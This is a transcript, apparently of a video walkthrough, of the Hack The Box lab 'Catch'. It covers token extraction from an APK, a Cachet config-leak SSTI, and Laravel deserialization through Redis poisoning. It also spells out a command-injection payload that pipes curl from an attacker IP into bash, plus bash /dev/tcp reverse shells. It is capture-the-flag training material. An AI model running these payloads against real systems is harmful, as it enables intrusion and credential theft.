HackTheBox - Catch

Key Takeaways

what's going on youtube this is ipsec i'm doing catch from hack the box which is all about catching an api key out of a android apk file and you do that by just decompiling it looking at the strings you can find a few api keys to various services you google those services api interfaces read the documentation see how to utilize the token and in one of them is a chat room you can use the api key to view all the rooms view the messages things like that and you intercept a password out of one of the chat rooms to access a different service named catch it that has a bunch of vulnerabilities now this captured service also has a pre-authentication sql injection so you could have skipped everything as long as you found this one service once you get on the box you can find there's a prives and how it handles analyzing apk files so if you change the name there's a command execution or command injection in there but with that being said let's just jump in as always we're going to start with the nmap so dash sc for default scripts sv enumerate versions oh a output off formats put in the nmap directory and call it catch and then the ip address of 1010 11.150 this can take some time to run so i've already ran it looking at the results we have five ports open i can tell that because it says 995 closed ports and the default and map scans the top 1000 so the first port is ssh on port 22 and its banner tells us it's an ubuntu server nothing really interesting there um http on port 80 it runs apache on ubuntu and it's not really giving us anything that hdb title is catch global systems but nothing too interesting then we have port 3000 open and based upon the scripts i'm going to guess this is a web server because we see http here and the cookie i like get t so it looks like there is a application called get t on this i just know it based upon the cookie um the application's name is getty it's like a open source version of github type thing or something i don't know exactly what it is i've only seen it on hacked box but i know a lot of places do use it if you look at like showdown and things like that we also have port 5000 open and this looks like it is also going to be http and looking at this we see this cookie has a connect dot sid and i want to say that's popular in nodejs applications so i think maybe express uses this by default so this one's probably node um get t i don't know what language that is let's go to firefox real quick get t [Music] um github and i just noticed my foxy proxy's not here uh-oh uh that's in go so the first web server is go lang the second one is probably going to be express and port 8000 looks like it is http apache and we're not getting any headers here interesting enough when like nmap discovers it is apache it doesn't seem to be printing every header or maybe it's just not giving us the cookies so what i'm going to do is let's go to 10 10 11 150 port 8000 and we see catch global systems um powered by catch it if we look at this it's an open source thing if we go to github uh this is looks like laravel so php um let's take a look at the cookie just to see if anything comes out and i don't know why firefox decided to um not tell me i have foxy proxy anymore so 10 10 11 150 [Music] port 8080 okay and now let's hope this works intercept on refusing what 12701 8080 proxy let's see sox5 you can take that off i guess oh uh 127.001 that's what i wanted there we go so now refresh and look at intercept yeah we have a larval session so nmap doesn't show the cookie by default if you um if it detects it as http i guess so we know this is definitely laravel um if we go to port 80 we can see exactly what this is potentially so let's intercept on refresh um let's see i'm going to get rid of my cookies real quick because i think those cookies like that larval session is coming on because um i access it on a different port so let's delete this delete all why is the cookie still here storage delete all delete um i am not sure why i can't delete this let's just clear uh clear data yes clear history something is going on with my firefox i think i still see the cookie let's restart firefox see proxy is still set 10 10 11 150 okay i don't have any cookies now so if i intercept this go over to repeater we send it and the server is not sending us any cookies back so this isn't leaking what it is yet so the next thing i'm going to do is try like slash index.html to see if this is html index.php we get something back so we know this web page is probably going to be php and if we look at it we have a few links um teams that is not a link i'm going to press f12 look at this teams li so it's just a list it doesn't look like it is an actual link um we got sign up login those don't go anywhere download now and download now looks like it is downloading an apk so that is an android package so we can save the file and then the very first thing i always do with apks is try opening them up and like jadex or decompiling them so i'm going to move downloads um catch apk and then we can do jad x dash gui and you can just apt install this and we're going to open up this apk and see what we have um let's see open maybe you don't specify the file name with the um argument if you do open you can we can see the catch apk and if we go to i probably com these are like default android libraries but com example catch and we can see the source code here so it looks like it has decompiled it successfully um do we have like a dark mode de-obfuscation navigation file preferences oh there's a lot of things um probably not going to worry about it light dark um dracula i'm not sure why that doesn't go dark but oh well um it looks better so we look at main activity and let's see we have a web client and it looks like this is the main function oncreate it's just going to open status.catch.htb so let's go and open this so we have to edit a host file because by default we won't resolve to this so 10 10 11 150 put this in delete the https and then we can go status.catch.htb and we have a webpage so this looks like the same thing as before so nothing too interesting here we can do um let's see if we do file there's got to be a search here right quark engine if we do a text search we can search everything and we can search for things like password right um so if i do password we can see where password exists token is another good one to use i think because i hit enter by deep like my habit hit enter and it went to the first thing so let's look for token and we scroll we do see things in this strings.xml and we have a get t token and a let's chat token and a slack token so we can potentially use these to log into applications and generally when you have a token um this is going to be an api so we want to look for the gipty api so i'm just going to disable my proxy because i don't have a certificate for my burp suite in and we can just google get t api doc and see how to access it usage and let's see curl username password we don't want that um this is getting tokens um authorization token header so we want to do something like this right so curl um authorization token this and we just want to find a reference that is easy to hit so i wonder if i just do a curl against slash api v1 so if we do curl 10 10 11 150 this was port i want to say 3000 is get t um let's see yep it is i can see right here so slash api v1 404 not found so what i'm looking for is some low level like low privilege endpoint right um because if i did the example with this authorization token um if this repo doesn't exist then it's going to just fail right um so if i do slash repos not found so we need to get some api particularly one that won't 404 um let's see get t api get current user let's see api usage is this the same document i'm at enable swagger see api v1 users because this is saying your username i can't just use this one right um their api documentation sucks uh let's see api swagger here we go so see get slash user um [Music] use so api v1 user token is required this is what we wanted right so now i can do dash h for header and we want to go back to how they used it we do authorization token and then our token right so authorization token and we need to go to this and we can copy it and saying token is required so i'm guessing this token is invalid however we have other things so let's chat um let's go to port five thousand eight thousand so ten ten eleven one fifty five thousand um five thousand is let's chat and eight 000 is oh we saw this before oh this was catch it right so we have a token for let's chat so i'm going to google let's chat api documentation and one of the things i noticed of this token is it's base64 um just the two equals at the end the padding of base64 makes that really stand out so the first thing i want to do echo dash n put the base64 in decode it and it looks like a hex blob calling a hex blob and like i don't think 16 is a valid um hex so i don't think this is just hex encoded or at least ascii so let's see let's chat api documentation let's chat api let's chat wiki authentication so it uses bearer tokens so that's authorization colon bearer and we can do a get on rooms so let's try this i'm going to copy this token and we can curl 10 10 11 150 slash rooms and this was port 5000 i want to say and dash h i'm going to put the header before the thing because we don't want to change this too often authorization i think bearer like this is how we do a bear token it is awesome um if we put invalid something invalid there let's just get rid of a few characters we can see it just says unauthorized right so we have successfully done that we can do a jq dot so we print this out i'm going to add a dash s which is going to be silent so it doesn't print um that like curl downloading thing and i'm going to do [Music] open close brackets to get past this and then i want to look at name right and let's see we got status android development and employees so we can probably go into the employees chat right so let's see this is getting rooms so room colon room so i wonder if we just do rooms if we look at employees copy paste jq no longer has a name and we can see let's see the id this is the room we have slug employees um private false so it's not a private room but this isn't getting messages so we want to see how to get a message we could delete a room um if i go back i'm going to search message messages so room uh colon room is going to be the id slash messages so if i put slash messages here we should get the messages of this room so i'm just going to do the jq thing again to do text and we can see the messages of this um the it admin is lucas but nothing too interesting there so let's look at the rooms again and i want to get um status so let's go to this room this is the id and if we put it here and go slash messages we can see the message and we got credentials john and then this string so i'm going to try ssh john at 10 10 11 150. and paste this in and we can't log in um i'm reading the rest of this we can try this at the catchup page i guess so if we go here go to dashboard we can log in john paste the password and it's taking its sweet time maybe to log in i'll come back to that because i want to look at the um last rooms messages this android dev so let's copy this room id and look at the other room paste this in um working on an android app so nothing interesting here but now we are in um the catch it if i click on settings let's see what is this is this button log out probably um 240 dev so i'm going to google catch it 2 4 0 and we have a blog posting of exploitation so there is a pre-authentication cv uh sql injection which we probably could have exploited if we just enumerated this earlier um there is rce and there is something else here right let's see i'm going to go through a lot of these but how i originally did the box i saw this configuration leak if we go to google on this let's see um prc we can look at it and download it and let's google um or not google but i'm going to call this just exploit.pi set mode to paste so i can just paste this in if we exploit it we have dash n username p password url and the script allows us to set a proxy which is super handy so username is john password is let's see [Music] um this string dash u 10 10 11 150 this is port 8000 and i'm going to set the proxy but i'm not going to intercept i'm just going to pass it in and we can look at it through the http history so we run this uh the password has uh some bad characters so we have to put that in quotes so single quote single quote uh dash n is required out of habit i did dash u for username and it's dash n um let's see no adapters were found we probably have to give this http and my proxy is actually intercepting so let's turn that off and we can see what it does so we have it logging in oh well it doesn't get first probably to test it and man it did a lot of post requests there we're doing token we log in we're going into dashboard settings mail and i think the reason it's doing all this is because of the cross-site scripting things right um token and we're sending a post doesn't look like we're really setting anything here so this is another get then we're going to do a post smtp and right here we can see the actual exploit um if we read the post we know it's just like server side template injection but they're just putting the dollar bracket and then the variables from a config and it's going out and just putting the variable there so the next thing it does is a get request and if we look at the response we should see it but it's going to set it back right so one of the post sets everything back instead of viewing it in this way i'm just going to copy something so if we look at db username i guess we'll try to make it say but we have everything here um since we have this app key we can exploit a larval deserialization most likely but we have mysql creds and this i believe is ssh as well but i want to show this exploit exactly what it's doing it's ssti and it's the best type of ssdi because we want to build a complex payload we just can leak variables right so notify at this i'm going to put db username let's just do 127.001 for this user password and it was notify i'm going to see if it's will once i save this so save let's click on mail again and it is will because we put the db username we can put db password as well and see what happens here and i don't know if we have to fill out all these um i just do it because i guess habit if i go back to mail it still says will i'm guessing there's a bad character in this password that prevented it right but um yeah so that is the ssti there so let's go and ssh into this box so i'm going to ssh will at 10 10 11 150 put the password in and we're in the first thing i always like checking is just the pseudo rules sir sudo dash l paste in the password and will can not run sudo so the next thing we can do is look at the users on the box and i'm just going to grab everything that ends in sh because this generally gets used with the shell we can see home get has a shell does will i'm guessing git is going to be part of that get t application that we saw earlier but i don't really see too much there so i'm just going to do a ps ef forest and it's going to list a list of all these processes we could take a look at the mysql database because we did have the password for this if i just do mysql dash h i want to say 12701 dash u will dash p put in his password we can log into the database um we only have catch it so we could go into this database and look at it we don't have um the ability to go into the other applications and extract other credentials right um so i'm just looking at show tables we can select star from users and we can kind of get a look there i like now replacing that semicolon with his backslash capital g because it prints it out a bit nicer but um we already had oh no we had john that's where that john is not here um i'm not exactly sure how this application works but we could try cracking admin but nothing really too interesting if we go into the op directory we see an mdm which normally stands for mobile device management and it kind of makes sense because there was an android application if i go here there's a verified dot sh if we cap this we can see it's an mdm checker i'm going to vim it and look at it so vim verified sh and we can see um it's doing some type of signature check here um argument one and argument two that's what that means we don't know exactly what this is um compatibility check looking at the sdk version it wants it to be um less than eight it wants it to be above 18 because we see if the sdk version is less than 18 then say apk doesn't meet these requirements and exit and here we're pulling the app name out of res values strings.xml and if the app name has catch in it then it's going to um echo the app name and then do an x-ergs and make a directory and right here it looks like we have command injection because we're just passing a variable that we can potentially control if we can control this app name in this file and if we put like a semicolon here we could potentially trigger command execution or backticks or dollar parentheses there's a lot of things we have so we just have to name it catch and then something else right and then clean up and it's looking at the dropbox so this is the actual loop it's going into the dropbox which is opt mdm apk bin and then um extracting it so we just have to pass sig check and compatibility check and then in the app check is where we have the command execution so uh we just want to make sure android manifest is above version 18 and i don't know what the jar signer is um but we'll see if that comes into play i bet if we just use apk tool and build something it may pass that um not positive so if we go into apk bin we don't have anything so we can do a ps ef and see if this thing is running um i'm guessing it's on some type of cron so we have to run p spy or something if we do dash dash forest again we can see there is this rootcheck.sh its parent process id is one zero zero four two so we can try looking at this so if i go cd proc 10042 cat cmd line we can see it's doing a loop and just executing check.sh constantly so nothing too interesting there that process is running quite a few times we see root checked rsh more than once uh we got doco running i'm guessing some of the web apps just run in docker uh we can confirm let's chat was indeed a node.js thing we see it starting with npm and yeah so let's go back to our box and create an apk so we already have this catch version 1.0 apk so that's what i'm going to use um i have apk tool i think i installed this in the router space video so um if you don't have it and you have trouble installing it go to that video but i think it was just an apt install i'm going to do a d i think d stands for decompile s for source and i'm going to give it the apk and then o is going to be an output i'm going to give it um the app and it's going to decompile into this app directory right and then if we look at android manifest we want to look at the version right so i'm going to go back into opt mdm v verify and compatibility check it's looking for let's see compile sdk version compile sdk and it's at version 32. um so we're above 18 that should be fine the other thing we need to do is the name so let's go down and let's see it is string name so string name oh we're in a different file now um res value strings xml so res values strings.xml string name equals let's see app name here we go so it's catch and i'm going to do curl 10 10 14 8 slash pwn let's do this on port 8000 and then do another semicolon and i'm going to pipe it over to bash so what this is doing is it's going to replace this app name let's see right here so it's going to make this echo and then we'll do curl or ip and then pipe it over to bash and then another semicolon so the x-erg just fails but it already executes this so it doesn't matter um for good measure we could do like a comment or something so that command doesn't fail but i don't think it matters and i'd rather not put another special character in this if i don't have to um the only thing i don't know right now is if app name can have a space and that's what we're about to find out probably so we go back up we can do a apk tool b for build app and dash o i'm going to call this catch ipsec dot apk and oh it failed i think see did this could not exec sdk one i don't know where it's actually erroring at invalid file name must only contain a to z zero naught huh so i don't think it likes this i don't know if that's crashing it though um so i'm going to remove all the special characters real quick so if i do v app res i think it's values then strings and go where the curl is and we just actually i'm going to back this file up first and now i can go where the curl is and we can delete this and let's see if apk tool builds us now and it doesn't i should see an ipsec one so i'm going to google this error and i'm starting with this one not only because it's first but like it's saying it can't extract a resource which sounds worse than invalid file name so let's just google this github issue let's see a few things dash f dash r i don't know what those flags are but let's try it so dash f dash r still nothing see um apk tool so they removed it and then installed it from here this is 261 apk tool v probably for version let's see 250 so let's download the latest i guess save this downloaded move downloads apk tool and then we can execute with java jar apk tool and we can copy this actually i'm going to go to the one without the flags i don't know copy paste and that looks better and it built catch up sec okay so now let's go back to a move history let's see um here is strings dot xml and this goes in app res values that one just has our um let's see the curl command right yep that's back there so we can set up a web server so make dirt dub dub dub let's move or build and then we will move catch ipsec into dub dub dub and python3-m http server and we go back up here apk bin wget 10 10 14 8 8 000 catch ipsec dot apk okay and i'm guessing um if this verify script hits we'll get a call back on our web server if i can be quick enough we can probably we're not quick enough but there we go we see it hit pwn and try to execute it so um let's just put a shell here so bin bash dash i dev tcp 10 10 14 8 9 000 1 0 and 1 like that okay and we can run this again and now when it hits pound it should send us a shell give it a second and there we go um we have root at catch so that was probably the easiest way to do this box it wasn't the intended way the intended way did not give us ssh credentials right away instead it used um a different exploit path that we're going to walk through so let's step back um the intended way starts at having access into this catchat system and instead of extracting the config via this interface we do a different exploit and point a redis instance to us and then use php deserialization to attack this so let's get started with that the first step is to get back to the catch exploit page that we had found earlier so let's search this and if we go let's see i'm just going to do a search um it's talking about an exploit right here where we can overwrite an environment file so it's very much like this ssti but it's more of along the lines of a mass assignment vulnerability where we're going to use this form to write to not the mail but the um i want to say session driver or cash driver so the first step is we have to install radis but i already have it installed so i'm just gonna do redis server and do protected mode is equal to no and then if we do redis cli we can access it if you don't have it installed you can just install it with apt install redis server we can do key star and it's empty right now because nothing's pointed to it so that's where the exploit comes in so let's go back to this settings page we're going to intercept the request and we're going to use that mass assignment like vulnerability to replace the mail driver with cash driver and what that's going to do is now when larval sees this instead of editing the ini for the mail driver it's going to edit the entries for the cash driver so we put its string in and this redder server is going to be 10 10 14 8 database can be 0 session like that that looks good and i'm going to send this over to repeater so i can just copy and paste this quickly so i pressed ctrl r but we can't just use repeater constantly because um [Music] um what did some call it uh the cross-site request forgery so now we can see it gave us a key so what we want to do is poison this key with a php object so i'm going to get opt php gcc which is php gadget chain collector it's just on github if you just google php gc you will find it and we can list with dash l we want to grab larval and i'm going to pick rce 9 because it's good from 5'4 all the way up to 918. i wouldn't do one like rce5 because this is very specific you'd have to enumerate the larval version i like going as broad as possible so the other thing we're going to do is a dash a just because i know for this one it's more reliable so if it doesn't work without the dash a um then add dash a i don't know a good way to know it other than experimenting right so we do dash a larval rce9 and we can test it with system id and we get this gadget chain so i'm going to set this key equal to this value so now when the server goes to pull this key it should get the poisoned entry and we should see the id um nothing's happening here because i'm guessing the server reverted itself so let's just go back into mail and intercept this then go into the repeater tab copy this and paste it in the correct spot forward and going here we get an error page but up top we do see the id command ran so now the next thing to do is the same exact thing but instead of doing id let's do bin bash dash c bash dash i devtcp 1010 14 8 9001 0 and 1. and oddly enough it doesn't look like it's escaping the double quotes and it uses double quotes elsewhere i don't know if that's going to cause an issue if this doesn't work i'm going to guess that's an issue but with php deserialization or with objects in general it lists the length so this s means string 55 this is a string of the length 55 so maybe the quotes won't mess it up um we can do key stir we can set this key equal to the reverse shell value so copy paste oh let's see set i'm guessing maybe that was an error because of the bad characters hopefully not value let's see maybe i copied the top piece too doesn't look like it oh shoot um i think i put double quotes no i didn't up there this little command line thing is so slow i don't know what i screwed up because that looks identical um [Music] i'm going to guess it is the single quotes here i'm going to put this in double quotes and this one in single quotes does this change at all yes it does so what was happening is i used single quotes here which put a single quote in my payload and since i was doing single quotes into the redis that's what screwed it up so now i did a double quote here so that may resolve the issue quotes are always a pain so set this is equal to not that but this same quote paste there we go uh we want to definitely start a reverse shell or start listener i'm guessing it's not going to work right away because we have to repoison it i think there's just probably a cron that's reverting this file or something so people don't break the server so copy paste that's not copy copy paste forward and we get a reverse shell as dub dub dub data and then the next intended step here would be to go find that dot n file and if you cut the dot n file you would get um the um database password which was will so uh we could also go into probably proc self i wonder if we have it just an environment variable db username yeah we do because we're a shell of the web server we get the web server's environment and if we look uh db username is will right there and the db password is right here um i was just going to go to proc self and cat environ right that's a different way to do it but um yeah that is doing this box the intended way through the php deserialization and i'm not going to show the sql injection but if you just go to the post and search for that sql whoops i passed it let's go up if we copy this and paste it we have to fix a proxy but there is exploit scripts for it it'll just get you the administrator hash which i think you may be able to crash or you can uh crack or you can change the exploit in order to leak a file probably instead i'm not exactly sure how this one works but the script is pretty self-explanatory so you just run this give it the hostname and yeah so hope you guys enjoy the video take care and i will see you all next week